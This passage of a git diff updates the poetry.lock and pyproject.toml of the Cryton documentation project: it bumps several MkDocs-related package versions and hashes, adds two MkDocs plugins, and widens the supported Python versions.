"sha256:0c95f12b74681e9ae127728f7e5409cbbef9cd914d5896ef238cc779b8152373"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fca62a8301b605b954ad2e9c3666f9d97f63872aa4efcae5492baca2056b74ab"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ac0aa6cd53ab9a31d397f8303f92c42f534693528fafbdb997c82bae6e477ad9"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c3af8e0f07399d3176b179f2e2634c3ce9c1301379a6b8c9c9aeecd481da494f"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a5fc78f9e3f501a1614a98f7c54d3969f3ad9bba8ba3d9b438c3bc5d047dd28"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:628c985afb2c7d27a4800bfb609e03985aaecb42f955049957814e0491d4006d"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:74db0052d985cf37fa111828d0dd230776ac99c740e1a758ad99094be4f1803d"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:1e8fcdd8f672a1c4fc8d0bd3a2b576b152d2a349782d1eb0f6b8e52e9954731d"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:04afa6387e2b282cf78ff3dbce20f0cc071c12dc8f685bd40960cc68644cfea6"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:dd5653e67b149503c68c4018bf07e42eeed6b4e956b24c00ccdf93ac79cdff84"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d2686f91611f9e17f4548dbf050e75b079bbc2a82be565832bc8ea9047b61c8c"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-win32.whl", hash = "sha256:4155b51ae05ed47199dc5b2a4e62abccb274cee6b01da5b895099b61b1982974"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-win_amd64.whl", hash = 
"sha256:322102cdf1ab682ecc7d9b1c5eed4ec59657a65e1c146a0da342b78f4112db23"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:e633940f28c1e913615fd624fcdd72fdba807bf53ea6925d6a588e84e1151531"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3a06f32c9634a8705f4ca9946d667609f52cf130d5548881401f1eb2c39b1e2c"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:7381c66e0561c5757ffe616af869b916c8b4e42b367ab29fedc98481d1e74e14"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3573d376454d956553c356df45bb824262c397c6e26ce43e8203c4c540ee0acb"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e89df2958e5159b811af9ff0f92614dabf4ff617c03a4c1c6ff53bf1c399e0e1"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:78cacd03e79d009d95635e7d6ff12c21eb89b894c354bd2b2ed0b4763373693b"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:de5695a6f1d8340b12a5d6d4484290ee74d61e467c39ff03b39e30df62cf83a0"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:1c60b9c202d00052183c9be85e5eaf18a4ada0a47d188a83c8f5c5b23252f649"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:f645caaf0008bacf349875a974220f1f1da349c5dbe7c4ec93048cdc785a3326"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:ea9f9c6034ea2d93d9147818f17c2a0860d41b71c38b9ce4d55f21b6f9165a11"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:80d1543d58bd3d6c271b66abf454d437a438dff01c3e62fdbcd68f2a11310d4b"}, + {file = 
"charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:73dc03a6a7e30b7edc5b01b601e53e7fc924b04e1835e8e407c12c037e81adbd"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6f5c2e7bc8a4bf7c426599765b1bd33217ec84023033672c1e9a8b35eaeaaaf8"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-win32.whl", hash = "sha256:12a2b561af122e3d94cdb97fe6fb2bb2b82cef0cdca131646fdb940a1eda04f0"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3160a0fd9754aab7d47f95a6b63ab355388d890163eb03b2d2b87ab0a30cfa59"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38e812a197bf8e71a59fe55b757a84c1f946d0ac114acafaafaf21667a7e169e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6baf0baf0d5d265fa7944feb9f7451cc316bfe30e8df1a61b1bb08577c554f31"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8f25e17ab3039b05f762b0a55ae0b3632b2e073d9c8fc88e89aca31a6198e88f"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3747443b6a904001473370d7810aa19c3a180ccd52a7157aacc264a5ac79265e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b116502087ce8a6b7a5f1814568ccbd0e9f6cfd99948aa59b0e241dc57cf739f"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d16fd5252f883eb074ca55cb622bc0bee49b979ae4e8639fff6ca3ff44f9f854"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21fa558996782fc226b529fdd2ed7866c2c6ec91cee82735c98a197fae39f706"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f6c7a8a57e9405cad7485f4c9d3172ae486cfef1344b5ddd8e5239582d7355e"}, + {file = 
"charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ac3775e3311661d4adace3697a52ac0bab17edd166087d493b52d4f4f553f9f0"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:10c93628d7497c81686e8e5e557aafa78f230cd9e77dd0c40032ef90c18f2230"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:6f4f4668e1831850ebcc2fd0b1cd11721947b6dc7c00bf1c6bd3c929ae14f2c7"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0be65ccf618c1e7ac9b849c315cc2e8a8751d9cfdaa43027d4f6624bd587ab7e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:53d0a3fa5f8af98a1e261de6a3943ca631c526635eb5817a87a59d9a57ebf48f"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-win32.whl", hash = "sha256:a04f86f41a8916fe45ac5024ec477f41f886b3c435da2d4e3d2709b22ab02af1"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:830d2948a5ec37c386d3170c483063798d7879037492540f10a475e3fd6f244b"}, + {file = "charset_normalizer-3.1.0-py3-none-any.whl", hash = "sha256:3d9098b479e78c85080c98e1e35ff40b4a31d8953102bb0fd7d1b6f8a2111a3d"}, ] [[package]] @@ -346,16 +333,50 @@ watchdog = ">=2.0" i18n = ["babel (>=2.9.0)"] min-versions = ["babel (==2.9.0)", "click (==7.0)", "colorama (==0.4)", "ghp-import (==1.0)", "importlib-metadata (==4.3)", "jinja2 (==2.11.1)", "markdown (==3.2.1)", "markupsafe (==2.0.1)", "mergedeep (==1.3.4)", "packaging (==20.5)", "pyyaml (==5.1)", "pyyaml-env-tag (==0.1)", "typing-extensions (==3.10)", "watchdog (==2.0)"] +[[package]] +name = "mkdocs-include-markdown-plugin" +version = "4.0.3" +description = "Mkdocs Markdown includer plugin." 
+category = "main" +optional = false +python-versions = "<3.12,>=3.7" +files = [ + {file = "mkdocs_include_markdown_plugin-4.0.3-py3-none-any.whl", hash = "sha256:bea863f0f4773c2dba4524e629bed222b0ce4135bcd47fc2fc6f524384f21bd8"}, + {file = "mkdocs_include_markdown_plugin-4.0.3.tar.gz", hash = "sha256:0b98f8877a6e262a91024dae0d40597b04ebe9175f5dfdfa5796a9068e24458a"}, +] + +[[package]] +name = "mkdocs-macros-plugin" +version = "0.7.0" +description = "Unleash the power of MkDocs with macros and variables" +category = "main" +optional = false +python-versions = ">=3.5" +files = [ + {file = "mkdocs-macros-plugin-0.7.0.tar.gz", hash = "sha256:9e64e1cabcf6925359de29fe54f62d5847fb455c2528c440b87f8f1240650608"}, + {file = "mkdocs_macros_plugin-0.7.0-py3-none-any.whl", hash = "sha256:96bdabeb98b96139544f0048ea2f5cb80c7befde6b21e94c6d4596c22774cbcf"}, +] + +[package.dependencies] +jinja2 = "*" +mkdocs = ">=0.17" +python-dateutil = "*" +pyyaml = "*" +termcolor = "*" + +[package.extras] +test = ["mkdocs-include-markdown-plugin", "mkdocs-macros-test", "mkdocs-material (>=6.2)"] + [[package]] name = "mkdocs-material" -version = "9.0.14" +version = "9.1.1" description = "Documentation that simply works" category = "main" optional = false python-versions = ">=3.7" files = [ - {file = "mkdocs_material-9.0.14-py3-none-any.whl", hash = "sha256:e6b1abc3527ece8522abd8fd76bf30c535f3420b20e11095fc7a8818b31385e5"}, - {file = "mkdocs_material-9.0.14.tar.gz", hash = "sha256:eff6c2c2ebe89bb99b8bf2167f546bdd35c8d5130694d1823361d6cf9c701c22"}, + {file = "mkdocs_material-9.1.1-py3-none-any.whl", hash = "sha256:3b20d4e9ee28b2c276d391eb2c4e599ff8865e6c7dcab8146a7fd9805ca59263"}, + {file = "mkdocs_material-9.1.1.tar.gz", hash = "sha256:836f0066c9346afc05b1962c146ea097025512bbb607c5f04a38248d7415f165"}, ] [package.dependencies] @@ -410,18 +431,19 @@ plugins = ["importlib-metadata"] [[package]] name = "pymdown-extensions" -version = "9.9.2" +version = "9.10" description = "Extension pack for Python 
Markdown." category = "main" optional = false python-versions = ">=3.7" files = [ - {file = "pymdown_extensions-9.9.2-py3-none-any.whl", hash = "sha256:c3d804eb4a42b85bafb5f36436342a5ad38df03878bb24db8855a4aa8b08b765"}, - {file = "pymdown_extensions-9.9.2.tar.gz", hash = "sha256:ebb33069bafcb64d5f5988043331d4ea4929325dc678a6bcf247ddfcf96499f8"}, + {file = "pymdown_extensions-9.10-py3-none-any.whl", hash = "sha256:31eaa76ce6f96aabfcea98787c2fff2c5c0611b20a53a94213970cfbf05f02b8"}, + {file = "pymdown_extensions-9.10.tar.gz", hash = "sha256:562c38eee4ce3f101ce631b804bfc2177a8a76c7e4dc908871fb6741a90257a7"}, ] [package.dependencies] markdown = ">=3.2" +pyyaml = "*" [[package]] name = "python-dateutil" @@ -635,6 +657,21 @@ files = [ {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, ] +[[package]] +name = "termcolor" +version = "2.2.0" +description = "ANSI color formatting for output in terminal" +category = "main" +optional = false +python-versions = ">=3.7" +files = [ + {file = "termcolor-2.2.0-py3-none-any.whl", hash = "sha256:91ddd848e7251200eac969846cbae2dacd7d71c2871e92733289e7e3666f48e7"}, + {file = "termcolor-2.2.0.tar.gz", hash = "sha256:dfc8ac3f350788f23b2947b3e6cfa5a53b630b612e6cd8965a015a776020b99a"}, +] + +[package.extras] +tests = ["pytest", "pytest-cov"] + [[package]] name = "urllib3" version = "1.26.14" @@ -669,40 +706,40 @@ test = ["coverage", "flake8 (>=3.7)", "mypy", "pretend", "pytest"] [[package]] name = "watchdog" -version = "2.3.0" +version = "2.3.1" description = "Filesystem events monitoring" category = "main" optional = false python-versions = ">=3.6" files = [ - {file = "watchdog-2.3.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:c1b3962e5463a848ba2a342cb66c80251dca27a102933b8f38d231d2a9e5a543"}, - {file = "watchdog-2.3.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:9e651b4874477c1bf239417d43818bbfd047aaf641b029fa60d6f5109ede0db0"}, - {file = 
"watchdog-2.3.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:d04662017efd00a014cff9068708e085d67f2fac43f48bbbb95a7f97490487f3"}, - {file = "watchdog-2.3.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0f7d759299ce21a3d2a77e18d430c24811369c3432453701790acc6ff45a7101"}, - {file = "watchdog-2.3.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a4b9bece40d46bf6fb8621817ea7d903eae2b9b3ebac55a51ed50354a79061a8"}, - {file = "watchdog-2.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:242e57253e84a736e6777ba756c48cf6a68d3d90cb9e01bd6bfd371a949ace3a"}, - {file = "watchdog-2.3.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:3fa74b0ef4825f9112932675a002296cb2d3d3e400d7a44c32fafd1ecc83ada0"}, - {file = "watchdog-2.3.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:15bf5b165d7a6b48265411dad74fb0d33053f8270eb6575faad0e016035cf9f7"}, - {file = "watchdog-2.3.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:139262f678b4e6a7013261c772059bca358441de04fb0e0087489a34db9e3db0"}, - {file = "watchdog-2.3.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:8a214955769d2ef0f7aaa82f31863e3bdf6b083ce1b5f1c2e85cab0f66fba024"}, - {file = "watchdog-2.3.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4e648df44a4c6ea6da4d9eb6722745c986b9d70268f25ae60f140082d7c8908e"}, - {file = "watchdog-2.3.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:473164a2de473f708ca194a992466eeefff73b58273bbb88e089c5a5a98fcda1"}, - {file = "watchdog-2.3.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:ebe756f788cb130fdc5c150ea8a4fda39cb4ee3a5873a345607c8b84fecf018b"}, - {file = "watchdog-2.3.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a623de186477e9e05f8461087f856412eae5cd005cc4bcb232ed5c6f9a8709f5"}, - {file = "watchdog-2.3.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:43d76d7888b26850b908208bb82383a193e8b0f25d0abaa84452f191b4acdea4"}, - {file = "watchdog-2.3.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = 
"sha256:5ddbbe87f9ed726940d174076da030cd01ec45433ef2b1b2e6094c84f2af17f1"}, - {file = "watchdog-2.3.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3fa1572f5a2f6d17d4d860edbc04488fef31b007c25c2f3b11203fb8179b7c67"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_aarch64.whl", hash = "sha256:1d9c656495172873bf1ddc7e39e80055fcdd21c4608cf68f23a28116dcba0b43"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_armv7l.whl", hash = "sha256:00f93782c67042d9525ec51628330b5faf5fb84bcb7ebaac05ea8528cfb20bba"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_i686.whl", hash = "sha256:f1a655f4a49f9232311b9967f42cc2eaf43fd4903f3bed850dd4570fda5d5eff"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_ppc64.whl", hash = "sha256:aa4773160b9cb21ba369cb42d59a947087330b3a02480173033a6a6cc137a510"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:982f5416a2817003172994d865285dd6a2b3836f033cd3fa87d1a62096a162cc"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_s390x.whl", hash = "sha256:45c13e7e6eea1013da419bf9aa9a8f5df7bbf3e5edce40bc6df84130febf39d5"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_x86_64.whl", hash = "sha256:7767a3da3307d9cf597832f692702441a97c259e5d0d560f2e57c43ad0d191d2"}, - {file = "watchdog-2.3.0-py3-none-win32.whl", hash = "sha256:8863913ea2c3f256d18c33d84546518636e391cd8f50d209b9a31221e0f7d3fd"}, - {file = "watchdog-2.3.0-py3-none-win_amd64.whl", hash = "sha256:6d79b5954db8f41d6a7f5763042b988f7a4afd40b7d141456061fa7c5b7f2159"}, - {file = "watchdog-2.3.0-py3-none-win_ia64.whl", hash = "sha256:a3559ee82a10976de1ec544b6ebe3b4aa398d491860a283d80ec0f550076d068"}, - {file = "watchdog-2.3.0.tar.gz", hash = "sha256:9d39effe6909be898ba3e7286a9e9b17a6a9f734fb1ef9dde3e9bb68715fca39"}, + {file = "watchdog-2.3.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d1f1200d4ec53b88bf04ab636f9133cb703eb19768a39351cee649de21a33697"}, + {file = "watchdog-2.3.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = 
"sha256:564e7739abd4bd348aeafbf71cc006b6c0ccda3160c7053c4a53b67d14091d42"}, + {file = "watchdog-2.3.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:95ad708a9454050a46f741ba5e2f3468655ea22da1114e4c40b8cbdaca572565"}, + {file = "watchdog-2.3.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:a073c91a6ef0dda488087669586768195c3080c66866144880f03445ca23ef16"}, + {file = "watchdog-2.3.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aa8b028750b43e80eea9946d01925168eeadb488dfdef1d82be4b1e28067f375"}, + {file = "watchdog-2.3.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:964fd236cd443933268ae49b59706569c8b741073dbfd7ca705492bae9d39aab"}, + {file = "watchdog-2.3.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:91fd146d723392b3e6eb1ac21f122fcce149a194a2ba0a82c5e4d0ee29cd954c"}, + {file = "watchdog-2.3.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:efe3252137392a471a2174d721e1037a0e6a5da7beb72a021e662b7000a9903f"}, + {file = "watchdog-2.3.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:85bf2263290591b7c5fa01140601b64c831be88084de41efbcba6ea289874f44"}, + {file = "watchdog-2.3.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:8f2df370cd8e4e18499dd0bfdef476431bcc396108b97195d9448d90924e3131"}, + {file = "watchdog-2.3.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ea5d86d1bcf4a9d24610aa2f6f25492f441960cf04aed2bd9a97db439b643a7b"}, + {file = "watchdog-2.3.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:6f5d0f7eac86807275eba40b577c671b306f6f335ba63a5c5a348da151aba0fc"}, + {file = "watchdog-2.3.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5b848c71ef2b15d0ef02f69da8cc120d335cec0ed82a3fa7779e27a5a8527225"}, + {file = "watchdog-2.3.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0d9878be36d2b9271e3abaa6f4f051b363ff54dbbe7e7df1af3c920e4311ee43"}, + {file = "watchdog-2.3.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:4cd61f98cb37143206818cb1786d2438626aa78d682a8f2ecee239055a9771d5"}, + {file = 
"watchdog-2.3.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3d2dbcf1acd96e7a9c9aefed201c47c8e311075105d94ce5e899f118155709fd"}, + {file = "watchdog-2.3.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:03f342a9432fe08107defbe8e405a2cb922c5d00c4c6c168c68b633c64ce6190"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_aarch64.whl", hash = "sha256:7a596f9415a378d0339681efc08d2249e48975daae391d58f2e22a3673b977cf"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_armv7l.whl", hash = "sha256:0e1dd6d449267cc7d6935d7fe27ee0426af6ee16578eed93bacb1be9ff824d2d"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_i686.whl", hash = "sha256:7a1876f660e32027a1a46f8a0fa5747ad4fcf86cb451860eae61a26e102c8c79"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_ppc64.whl", hash = "sha256:2caf77ae137935c1466f8cefd4a3aec7017b6969f425d086e6a528241cba7256"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:53f3e95081280898d9e4fc51c5c69017715929e4eea1ab45801d5e903dd518ad"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_s390x.whl", hash = "sha256:9da7acb9af7e4a272089bd2af0171d23e0d6271385c51d4d9bde91fe918c53ed"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_x86_64.whl", hash = "sha256:8a4d484e846dcd75e96b96d80d80445302621be40e293bfdf34a631cab3b33dc"}, + {file = "watchdog-2.3.1-py3-none-win32.whl", hash = "sha256:a74155398434937ac2780fd257c045954de5b11b5c52fc844e2199ce3eecf4cf"}, + {file = "watchdog-2.3.1-py3-none-win_amd64.whl", hash = "sha256:5defe4f0918a2a1a4afbe4dbb967f743ac3a93d546ea4674567806375b024adb"}, + {file = "watchdog-2.3.1-py3-none-win_ia64.whl", hash = "sha256:4109cccf214b7e3462e8403ab1e5b17b302ecce6c103eb2fc3afa534a7f27b96"}, + {file = "watchdog-2.3.1.tar.gz", hash = "sha256:d9f9ed26ed22a9d331820a8432c3680707ea8b54121ddcc9dc7d9f2ceeb36906"}, ] [package.extras] @@ -710,21 +747,21 @@ watchmedo = ["PyYAML (>=3.10)"] [[package]] name = "zipp" -version = "3.14.0" +version = "3.15.0" description = "Backport of 
pathlib-compatible object wrapper for zip files" category = "main" optional = false python-versions = ">=3.7" files = [ - {file = "zipp-3.14.0-py3-none-any.whl", hash = "sha256:188834565033387710d046e3fe96acfc9b5e86cbca7f39ff69cf21a4128198b7"}, - {file = "zipp-3.14.0.tar.gz", hash = "sha256:9e5421e176ef5ab4c0ad896624e87a7b2f07aca746c9b2aa305952800cb8eecb"}, + {file = "zipp-3.15.0-py3-none-any.whl", hash = "sha256:48904fc76a60e542af151aded95726c1a5c34ed43ab4134b597665c86d7ad556"}, + {file = "zipp-3.15.0.tar.gz", hash = "sha256:112929ad649da941c23de50f356a2b5570c954b65150642bccdd66bf194d224b"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"] -testing = ["flake8 (<5)", "func-timeout", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"] +testing = ["big-O", "flake8 (<5)", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"] [metadata] lock-version = "2.0" -python-versions = "^3.8" -content-hash = "f979b2ad978f2fe9fdcd690b9ae3543ccb5fbc55a9dc6488bd7b9c700133870b" +python-versions = ">=3.8,<3.12" +content-hash = "5fe2f09dc9052b133d98f3f9310711423a6a160fddb1158940b15f1010f13740" diff --git a/pyproject.toml b/pyproject.toml index 6d7b651b01a56b3984e0afa14899fb30ac7b039f..824805b7444420fc9173ae984883fe6c7b377a92 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [tool.poetry] name = "cryton-documentation" -version = "2023.1.0a0" +version = "2023.1.0" description = "Documentation for Cryton toolset" authors = [ "Ivo Nutár <nutar@ics.muni.cz>", @@ -23,10 +23,12 @@ keywords = [ readme = "README.md" [tool.poetry.dependencies] -python = "^3.8" +python = 
">=3.8,<3.12" mkdocs = "^1.3.1" mkdocs-material = "^9.0.0" mike = "^1.1.2" +mkdocs-macros-plugin = "^0.7.0" +mkdocs-include-markdown-plugin = "^4.0.3" [tool.poetry.group.dev.dependencies]